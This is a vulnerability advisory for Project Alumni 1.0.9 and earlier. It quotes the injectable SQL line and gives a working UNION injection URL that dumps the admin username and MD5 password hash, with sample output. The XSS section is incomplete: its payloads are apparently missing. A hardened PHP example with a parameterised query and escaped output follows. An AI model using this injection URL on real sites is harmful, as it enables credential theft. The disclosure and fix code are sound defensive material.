project-alumni sql injection & xss
author : tomplixsee tomplixsee@yahoo.co.id
--------------------------------------------------------------------------

affected software version : project alumni 1.0.9, 1.0.8, or lower??
download : https://sourceforge.net/projects/project-alumni/

vulnerability
=============

1. sql injection
++++++++++++++++

vulnerable code in view.page.inc.php:

$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `alumniYear` = '".$_GET['year']."'");

the year parameter is taken straight from the query string and concatenated into the SQL text without escaping or a prepared statement, so a single quote in it terminates the literal and the rest of the value is parsed as SQL.

exploit:

http://victim/path/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1

result example:

 ________________________________________________________________________________
|Name                                             |Email                         |
|--------------------------------------------------------------------------------|
| tomplixsee (1) f25a2fc72690b780b2a14e140ef6a9e0 |Not Available                 |
|--------------------------------------------------------------------------------|

tomplixsee is the admin's username and f25a2fc72690b780b2a14e140ef6a9e0 is the MD5 hash of the admin's password.

2. xss
++++++

vulnerable code:
_____________________________________________________________________________________
/xml/index.php

  .....

  .....

exploit:
http://victim/path/xml/index.php?year=
_____________________________________________________________________________________
/index.php

  ....

  ....

  Alumni for the Graduating Year of

exploit:
http://victim/path/index.php?act=view&year=
______________________________________________________________________________________

thanks to: the networking crew at sukabirus, all my friends at stt telkom, jasakom community, sibalbal, crutz_ao, bidulux, akillers 179...........
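The two findings above share one root cause: the year request parameter is used raw, once inside the SQL string in view.page.inc.php and once echoed into the page heading. The following PHP is an added example, not code from the advisory or from the Project Alumni code base; it assumes a PDO connection (demonstrated on an in-memory SQLite database with a constructed alumni_users table) and replaces the project's dbQuery()/getConfigVal() helpers with a literal table prefix so that it runs stand-alone.

```php
<?php
// Added example, not part of the advisory or the Project Alumni project.
// Assumes: a PDO handle in $pdo, the table prefix from config (here a literal),
// and the alumni_users / alumniYear names shown in the advisory.

// Vulnerable pattern from view.page.inc.php: the request value is spliced into
// the SQL text, so a quote inside it changes the statement.
function vulnerableLookup(PDO $pdo, string $prefix, string $year): array
{
    $sql = "SELECT * FROM `{$prefix}_users` WHERE `alumniYear` = '" . $year . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: validate the value as a plausible graduating year, then
// bind it as a parameter so it is never parsed as SQL. The prefix is still
// interpolated, but it comes from configuration, not from the request.
function safeLookup(PDO $pdo, string $prefix, string $year): array
{
    $y = filter_var($year, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1900, 'max_range' => 2100]]);
    if ($y === false) {
        return []; // "2003' union select ..." never reaches the database
    }
    $stmt = $pdo->prepare(
        "SELECT `alumniUserName`, `alumniYear` FROM `{$prefix}_users` WHERE `alumniYear` = :year");
    $stmt->execute([':year' => $y]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Output side (the XSS in index.php and xml/index.php): escape the request
// value before echoing it into the "Alumni for the Graduating Year of" heading.
function renderHeading(string $year): string
{
    $safe = htmlspecialchars($year, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<h1>Alumni for the Graduating Year of {$safe}</h1>";
}

// Demonstration on a constructed in-memory database (sample rows, not real data).
$pdo = new PDO('sqlite::memory:');
$pdo->exec("CREATE TABLE alumni_users (ID INTEGER, alumniUserName TEXT, alumniPassword TEXT, alumniYear INTEGER)");
$pdo->exec("INSERT INTO alumni_users VALUES (1, 'admin', 'sample-hash-1', 2003), (2, 'bob', 'sample-hash-2', 1999)");
$prefix = 'alumni';
$tampered = "2003' OR '1'='1";
echo count(vulnerableLookup($pdo, $prefix, $tampered)), "\n"; // 2: the tampered value widens the query
echo count(safeLookup($pdo, $prefix, $tampered)), "\n";       // 0: rejected by validation
echo count(safeLookup($pdo, $prefix, '2003')), "\n";          // 1: normal lookup still works
echo renderHeading('<b>2003</b>'), "\n";                      // tags rendered inert as &lt;b&gt;
```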